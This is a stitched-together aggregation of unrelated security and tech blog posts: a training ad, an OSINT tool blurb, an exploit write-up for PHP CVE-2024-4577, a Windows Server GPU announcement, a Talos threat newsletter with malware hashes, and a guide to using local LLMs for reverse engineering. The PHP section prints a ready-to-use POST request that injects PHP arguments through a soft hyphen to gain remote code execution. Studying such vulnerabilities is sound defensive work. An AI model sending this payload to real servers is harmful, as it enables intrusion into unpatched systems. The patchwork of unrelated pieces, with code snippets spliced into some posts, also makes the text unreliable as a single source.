Recent advances in AI/ML technologies opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience helping clients safely and securely deploy these systems, we’ve discovered that their security teams have knowledge gaps at this intersection of AI/ML and systems security. We’ve developed our training to help organizations close this gap and equip their teams with the tools to secure their AI/ML operations pipelines and technology stacks.

What you will learn in our training

Our course is tailored for security engineers, ML engineers, and IT staff who need to understand the unique challenges of securing AI/ML systems deployed on conventional computing infrastructure. Over two days, we provide a comprehensive understanding of AI safety and security that goes beyond basic knowledge to practical and actionable insights into these technologies’ specific dangers and risks. Here’s what you will learn through a blend of instructional training and hands-on case studies:

  1. Fundamentals of AI/ML and cybersecurity: In this module, you will learn how AI/ML models/techniques work, what they can and cannot do, and their limitations. We also cover some essential information and software security topics that may be new for ML engineers.
  2. AI/ML tech stacks and operations pipelines: In our second module, you will learn how AI/ML models are selected, configured, trained, packaged, deployed, and decommissioned. We’ll also explore the everyday technologies in the AI/ML stack that professionals use for these tasks.
  3. Vulnerabilities and remediation: In this module, you will learn about the unique attack surfaces and vulnerabilities present in deployed AI/ML systems. You’ll also learn methods for preventing and/or remediating AI/ML vulnerabilities.
  4. Risk assessment and threat modeling: The fourth module covers practical techniques for conducting comprehensive risk assessments and threat models for AI/ML systems. Our holistic approaches will help you evaluate the safety and security risks AI/ML systems may pose to end users in deployed contexts.
  5. Mitigations, controls, and risk reduction: Finally, you will learn how to implement realistic risk mitigation strategies and practical security controls for AI/ML systems. Our comprehensive strategies address the entire AI/ML ops pipeline and lifecycle.

Equip your team to work at the intersection of security and AI/ML

Trail of Bits combines cutting-edge research with practical, real-world experience to advance the state of the art in AI/ML assurance. Our experts are here to help you confidently take your business to the next level with AI/ML technologies. Please contact us today to schedule an on-site (or virtual) training for your team. Individuals interested in this training can also use this form to be notified in the future when we offer public registration for this course!

PIP-INTEL - OSINT and Cyber Intelligence Tool

 


Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




No Way, PHP Strikes Again! (CVE-2024-4577)

7 June 2024 at 08:09

Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Fortunately, for defenders, the bug has only been exploited on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:

  • Chinese (both simplified and traditional), and
  • Japanese.

However, Orange cautions that other locales could be affected too, and urges users to upgrade to the latest version of PHP, which fixes these bugs (for detail, see their blogpost).

We are keen to point out that we are unsure how common this configuration, or deployment type, is in reality. It is also not our job to find out, outside of our client base. But, regardless, it's an interesting vulnerability due to the root cause. Enjoy with us.

Orange's blogpost, while informative, doesn’t tell us exactly what to do to get that sweet RCE. Unfortunately, the wide range of configuration options makes it difficult to conclusively prove an instance to be vulnerable (or not) at a passive glance, not least because a Windows machine's 'locale' is not typically externally fingerprintable. Because of this, we set about reproducing the bug—if we can exploit it, that’s the best way of proving exploitability, right?

Reading Orange's blog, it is clear that the bug only affects CGI mode of PHP. In this mode, the webserver parses HTTP requests and passes them to a PHP script, which then performs some processing on them. For example, querystrings are parsed and passed to the PHP interpreter on the command line - a request such as http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar.

This does, of course, introduce an avenue for command injection, which is why input is carefully handled and sanitized before calling php.exe (cough CVE-2012-1823). However, it seems there is a corner-case which the developers did not account for, which allows an attacker to break out of the command line and supply arguments that are interpreted by PHP itself. This corner-case relates to how Unicode characters are converted into ASCII. This is best explained with an example.

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?


No, neither can I. Let’s look at them in a hex editor and see if that gives us any clue.


Hmm, interesting - here we can see that the first invocation uses a normal dash (0x2D), while the second, it seems, uses something else entirely (a ‘soft hyphen,’ apparently), with the code 0xAD (highlighted). While they both appear the same to you and me, they have vastly different meanings to the OS.
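The difference between the two characters can also be checked without a hex editor. The following is a minimal Python sketch (the helper name `describe` is ours, not from the original post) that prints the code point, Unicode name, and single-byte Latin-1 encoding of each character:

```python
import unicodedata


def describe(ch: str) -> tuple[str, str, str]:
    """Return (code point, Unicode name, Latin-1 byte in hex) for one character."""
    return (f"U+{ord(ch):04X}", unicodedata.name(ch), ch.encode("latin-1").hex())


# The ordinary hyphen and the look-alike soft hyphen.
for ch in ("-", "\u00ad"):
    print(describe(ch))
```

The first line of output describes the ordinary hyphen (byte 2d) and the second the soft hyphen (byte ad), matching the bytes highlighted in the hex view.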

An important detail here is that Apache will escape the actual hyphen - 0x2D - but not the second ‘soft hyphen’, 0xAD. After all, it’s not a real hyphen, right? So there’s no need to escape it… right?

No Way, PHP Strikes Again! (CVE-2024-4577)
We don't care if it's the same joke as above, it's still funny.

Well. It turns out that, as part of Unicode processing, PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.
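For defenders, one way to look for this pattern in request logs is to flag query-string tokens that begin with the soft hyphen byte. The sketch below is illustrative only: the function name `suspicious_cgi_args` is hypothetical, and it assumes the query string is split into arguments on `+`, which is a simplification of how a CGI handler builds the command line.

```python
from urllib.parse import unquote_to_bytes

SOFT_HYPHEN = b"\xad"  # the byte that best-fit mapping may turn into '-'


def suspicious_cgi_args(raw_query: str) -> list[bytes]:
    """Return percent-decoded query tokens that start with a soft hyphen byte.

    Assumption: tokens are separated by '+', as in a CGI-style argument list.
    """
    tokens = [unquote_to_bytes(token) for token in raw_query.split("+")]
    return [token for token in tokens if token.startswith(SOFT_HYPHEN)]


print(suspicious_cgi_args("%ADd+foo%3d1"))  # one flagged token
print(suspicious_cgi_args("foo=bar"))       # nothing flagged
```

A check like this is a heuristic, not a substitute for patching: other best-fit mappings or encodings may not be covered by it.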

This is remarkably similar to an older PHP bug (when in CGI mode), CVE-2012-1823, and so we can borrow some exploitation techniques developed for this older bug and adapt them to work with our new bug. A helpful writeup advises that, to translate our injection into RCE, we should aim to inject the following arguments:

-d allow_url_include=1 -d auto_prepend_file=php://input

This will accept input from our HTTP request body, and process it using PHP. Straightforward enough - let’s try a version of this equipped with our 0xAD ‘soft hyphen’ instead of the usual hyphen. Maybe it’s enough to slip through the escaping?

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
 

Oh joy - we’re rewarded with a phpinfo page, showing us we have indeed achieved RCE.


Conclusions

A nasty bug with a very simple exploit - perfect for a Friday afternoon.

Fortunately, though, patches are available, so we echo Orange Tsai’s advice to upgrade your PHP installation. As always, fantastic work and a salute to Orange Tsai.

Those running in an affected configuration under one of the affected locales - Chinese (simplified, or traditional) or Japanese - are urged to do this as fast as humanly possible, as the bug has a high chance of being exploited en masse due to the low exploit complexity. Other users are still strongly encouraged to update:

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

We won’t duplicate the advisory here; instead, we advise those seeking remediation advice to refer to the comprehensive advisory.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

CVE-2024-4577 - Yet Another PHP RCE: Make PHP-CGI Argument Injection Great Again!

6 June 2024 at 22:00
This is a side story/extra bug while I’m preparing for my Black Hat USA presentation. I believe most of the details have already been covered in the official advisory (should be published soon). Although PHP-CGI has gradually been phased out over time, this vulnerability affects XAMPP for Windows by default, allowing unauthenticated attackers to execute arbitrary code on remote XAMPP

Introducing GPU Innovations with Windows Server 2025

Afia Boakye and Rebecca Wambua

 

AI empowers businesses to innovate, streamline operations, and deliver exceptional value.  With the upcoming Windows Server 2025 Datacenter and Azure Stack HCI 24H2 releases, Microsoft is empowering customers to lead their businesses through the AI revolution.

 

Here is what Hari Pulapaka, GM of Windows Server at Microsoft, says about how Windows Server empowers customers with AI: Windows Server 2025 is well positioned to help our customers be part of the AI revolution with its advanced GPU capabilities, allowing our customers to do training, learning, or inferencing using powerful NVIDIA GPUs.

 

GPUs are essential for AI due to their parallel processing capabilities and highly scalable architecture.  Using the upcoming OS releases, Microsoft’s customers can provide an entire GPU to a VM, which can run either Linux or Windows Server, in a failover cluster using discrete device assignment (DDA). This means that mission-critical AI workloads can easily run in a clustered VM and, upon an unexpected fault or a planned move, the VM will restart on another node in the cluster, using a GPU on that node.

 

GPU Partitioning (GPU-P) is a powerful new capability we are adding with Windows Server 2025. GPU-P empowers customers to partition a supported GPU and assign those partitions to different VMs in a failover cluster.  This means that multiple VMs can share a single physical GPU, giving each VM an isolated fraction of the physical GPU's capabilities. 

 

Further, due to a planned or unplanned move, the VMs will restart on different nodes in the cluster, using GPU partitions on those different nodes.  Besides enabling clustered VMs to use GPU-P, the upcoming OS releases are bringing live migration to VMs using GPU-P.  Live migration for GPU-P enables customers to balance mission-critical workloads across their fleet and to conduct hardware maintenance and software upgrades without stopping their VMs.

 

Windows Admin Center (WAC) empowers customers to configure, use, and manage VMs using virtualized GPUs.  WAC enables administrators to manage GPU virtualization for both standalone and failover clusters from a single, centralized location, thereby reducing management complexity.

 

The screenshots below highlight GPU-P management in WAC, demonstrating how users can seamlessly view, configure, and assign GPU partitions to VMs.

 

In this first image, customers can view a comprehensive list of their partitioned GPUs.

 


Figure 1: The GPU partitions inventory page

 

Customers can partition eligible GPUs with their desired number of partitions.


Figure 2: The partition count configuration page

 

Finally, customers can assign GPU partitions to different VMs.


Figure 3:  The GPU partition assignment tool

 

These high-value GPU innovations are a result of Microsoft's and NVIDIA's continual close collaboration.

 

Here is what Bob Pette, Vice President of Enterprise Platforms at NVIDIA, has to say.  “GPU virtualization requires advanced security, maximum cost efficiency, and accurate horsepower.  With GPU-P now available on NVIDIA GPUs in Windows Server Datacenter, customers can meet these requirements and run their key AI workloads to achieve next-level efficiencies.”

 

Windows Server 2025 is now available for customers to try out.  Click here to download preview media and use these powerful new capabilities.

 

The sliding doors of misinformation that come with AI-generated search results

6 June 2024 at 18:00

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, no AI-generated answer appeared when I searched for “Who should I vote for in the 2024 presidential election?” or “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 


Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 


Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.  

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type a question into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet; I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue. Perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

The one big thing 

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victims’ networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader."    

Why do I care? 

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg)

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that they dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic relay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security)

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol)

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

6 June 2024 at 19:09

Large Language Models (LLMs) such as those provided by OpenAI (GPT3/4), Google (Gemini), and Anthropic (Claude) can be useful tools when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is that the data you are reviewing is processed server side, meaning any data analyzed by the tool must be uploaded/sent to the server.

While these services provide privacy policies that may double pinky swear your data is safe, and they will not use it for training if you opt-out, as consultants we are often working with a client's data that is under NDA, preventing the usage of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this with OpenAI publicly confirming that it monitors usage of its service to identify potentially 'evil' usage by bad-actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • the service may go away (outage/sale)
  • the model may be modified to prevent malicious use (RE/exploitation is often flagged)
    • potentially resulting in monitoring or an account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging an LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and the model's parameter count. The parameter count can be thought of as the amount of 'knowledge' or data stored within the model: more parameters generally means more 'knowledge' the model can reference based on your input. OpenAI has not published the details of GPT4. GPT3 had more than 100 billion parameters (175 billion), while GPT3.5's size has not been disclosed; speculation/research/guessing indicates it is much smaller (~22b parameters) thanks to fine-tuning and/or other 'secret sauce'. It is speculated that the original GPT4 is in the +100-trillion parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range. This is a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy 2x the memory of the parameter size: 2b/4gb, 7b/14gb, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating point values for parameters; however, by clipping these values to smaller units (8/4-bit) the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.
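The rule of thumb above is simple arithmetic: parameter count multiplied by bytes per parameter. A minimal sketch follows (the function name is ours, and it deliberately ignores runtime overhead such as context/KV cache, so treat the result as a lower bound):

```python
def estimate_model_memory_gb(params_billions: float, bits_per_param: int = 16) -> float:
    """Rough weight-only memory estimate in GB.

    Assumption: memory = parameters * bytes per parameter; overhead such as
    the context cache is not included.
    """
    bytes_per_param = bits_per_param / 8
    return params_billions * bytes_per_param


for size in (2, 7):
    print(f"{size}b @ 16-bit: {estimate_model_memory_gb(size):.1f} GB")
print(f"7b @ 4-bit: {estimate_model_memory_gb(7, bits_per_param=4):.1f} GB")
```

Under these assumptions a 7b model drops from roughly 14 GB at 16-bit to about 3.5 GB at 4-bit, which is why quantized models fit on much smaller GPUs.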

When it comes to actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally with 24GB of VRAM, meaning an NVIDIA 3090 or 4090 - a used 3090 is best for the money for a turnkey solution. The next best setup is going to be an Apple Silicon (arm) MacBook/Studio/etc. While this may be contentious, it is difficult to match the performance of the shared memory architecture, as you are able to use system RAM for compute without a performance hit. While it is possible to run these models from system RAM using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results are most likely going to be slow. Of course there are caveats here: as with anything, you will find cases where highly tuned setups can perform well, but in this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally; in this case I am using Ollama as it just works and is fairly batteries-included for most use cases. Ollama provides installers for macOS, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry. The required files will automatically download and you will be dropped into an interactive 'chat' shell:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye
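Besides the interactive shell, Ollama also exposes a local HTTP API, which is more convenient for scripting. The following is a minimal sketch using only the Python standard library; it assumes the Ollama server is listening on its default port (11434), and the helper names `build_request` and `generate` are ours:

```python
import json
import urllib.request

# Assumption: default local Ollama endpoint; adjust if your server differs.
OLLAMA_URL = "http://localhost:11434/api/generate"


def build_request(model: str, prompt: str) -> urllib.request.Request:
    """Build a non-streaming generate request for the given model and prompt."""
    payload = {"model": model, "prompt": prompt, "stream": False}
    return urllib.request.Request(
        OLLAMA_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def generate(model: str, prompt: str, timeout: float = 120.0) -> str:
    """Send the prompt to the local server and return the generated text."""
    with urllib.request.urlopen(build_request(model, prompt), timeout=timeout) as resp:
        return json.loads(resp.read())["response"]
```

With the server running, `generate("phi3", "write me a sentence about local LLMs")` should return the same kind of text as the chat shell, without any data leaving the machine.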

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case you are looking to apply it to. In this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models that have been trained on code should be able to aid with this task; here I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size and I really wanted to target something that would be relatively performant on lower end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}
```

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response looks promising, but using it programmatically would be difficult. We can do better by adjusting our prompt to include instructions to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output:

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these is ideal, as we want only the JSON structure so that it can be parsed programmatically. By adjusting the prompt, we can try to guide the output towards what we expect:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

